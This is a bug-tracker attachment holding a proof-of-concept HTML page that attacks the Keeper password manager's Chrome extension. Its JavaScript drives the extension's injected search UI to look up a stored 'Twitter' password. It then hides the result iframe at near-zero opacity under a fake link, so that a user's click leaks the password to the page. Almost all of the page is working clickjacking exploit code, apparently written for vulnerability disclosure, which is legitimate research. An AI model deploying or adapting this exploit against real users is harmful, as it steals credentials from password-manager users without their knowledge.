New issue
Advanced search Search tips

Issue 917 attachment: keeper.html (5.0 KB) 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
 
<html>
<head>
<script>

const kSearchTerm       = "Twitter";  // What password to try to steal.
const kPollTime         = 1000;       // How often to check if the Keeper UI is ready.

var timer;
var frame;

// Interact with the UI elements Keeper adds to the page to bring up the search
// dialog.
function interact()
{
    var icon    = document.getElementById('keeper-icon-2');
    var search  = document.getElementsByClassName("ksec-icon-search")[0];
    var input   = document.getElementById('keeper-search-box-input');
    var w       = document.getElementById('keeper-injectWindow');
    var create  = document.getElementById('keeper-submitYesBtn');
    var log     = document.getElementsByClassName('keepersecurity_loginField')[0];
    var pw      = document.getElementsByClassName('keepersecurity_tx')[0];
    var save    = document.getElementById('save-and-fill-btn');

    // Click the little key icon added to input boxes.
    if (icon)
        icon.click();

    // Sometimes a dialog prompts before the popup is shown, dismiss it.
    if (create && create.offsetParent) {
        create.click();
        return;
    }

    // If it's prompting for a password, fill it in and then reload.
    if (pw && save && pw.offsetParent) {
        pw.value = "__ignore";
        save.click();
        setTimeout("document.location.reload()", kPollTime);
        return;
    }

    // Click the search icon on the top of the popup.
    if (search)
        search.click();

    // Hide the elements created by Keeper.
    if (w)
        w.style.display = "none";

    // Enter the search term "Google", which should add an iframe with results.
    if (input) {
        clearInterval(timer);
        input.value = kSearchTerm;
        input.dispatchEvent(new CustomEvent("keyup", {}))
        timer = setInterval(stealframe, kPollTime);
    }
}

function stealframe()
{
    frame = document.getElementById('keeper-search-result-frame-results');
    target = document.getElementById('target');

    if (frame) {
        clearInterval(timer);

        // We can't access the results, but we can move the iframe around, as
        // soon as it appears, remove it.
        frame.parentElement.removeChild(frame);
        target.style.display    = "block";
        // Move the iframe somewhere predictable, but make it transparent so
        // the user doesn't know they're clicking it.
        frame.style.position    = "absolute";
        frame.style.width       = "256px";
        frame.style.height      = "64px";
        frame.style.overflowX   = "hidden";
        frame.style.overflowY   = "hidden";
        frame.style.overflow    = "hidden";
        frame.style.opacity     = "0.01";
        //frame.style.top         = "-30px"; // First button
        frame.style.top         = "-82px"; // Second button
        frame.style.left        = "0px";
        target.appendChild(frame);
    }
}

</script>
<style>
    body {
        font-family: Arial, Helvetica, sans-serif;
        font-size: 16px;
    }

    /* Hide all Keeper UI */
    kwdiv {
        opacity: 0.01;
    }

    #target {
        display: none;
    }

    #test {
        opacity: 0.01;
    }

    #target {
        position: relative;
        font-weight: bold;
    }

    #filltitle {
        font-size: 14px;
        padding: 6px 0px;
        position: absolute;
        top: 7px;
        left: 7px;
    }

    /* This is the cssText from the real button */
    #fillbutton {
        font-family: Arial, Helvetica, sans-serif;
        font-size: 14px;
        line-height: 20px;
        color: rgb(0, 0, 238);
        width: 44px;
        padding: 6px 0px;
        height: 20px;
        text-align: center;
        font-weight: bold;
        border: 1px hidden;
        border-radius: 3px;
        cursor: pointer;
        float: right;
        margin-right: 16px;
        position: absolute;
        top: 7px;
        left: 185px;
        text-decoration: underline;
    }
</style>
</head>

<body onload="timer = setInterval(interact, kPollTime)">

<p>
This demonstration attempts to automate interacting with the Keeper Chrome
extension so that the page can steal passwords.
</p>
<p>
This is done by:
<ul>
    <li>Creating a hidden form that keeper adds a button (<img src="chrome-extension://bfogiafebfohielmmehodmfbbebbbpei/images/16x16gold.png">) to.</li>
    <li>Finding that button, then clicking it with JavaScript.</li>
    <li>Keeper injects a search dialog into the page, which I enter "Twitter" into.</li>
    <li>Waiting for Keeper to draw an iframe with the search results.</li>
    <li>Moving the frame around so you don't know what you're clicking on.</li>
    <li>If you do click it, the password is sent to the untrusted page.</li>
</ul>
</p>
<p>
The result is that if you click anywhere on a page, you could be sending a
password for another site.
</p>
<div id=target>
    <div id=filltitle>Try clicking this link:</div>
    <div id=fillbutton>Here</div>
</div>

<form id=test>
    <input type=text name=username>
    <input type=password name=password onchange="(value != '__ignore') && alert(value)">
</form>
</body>
</html>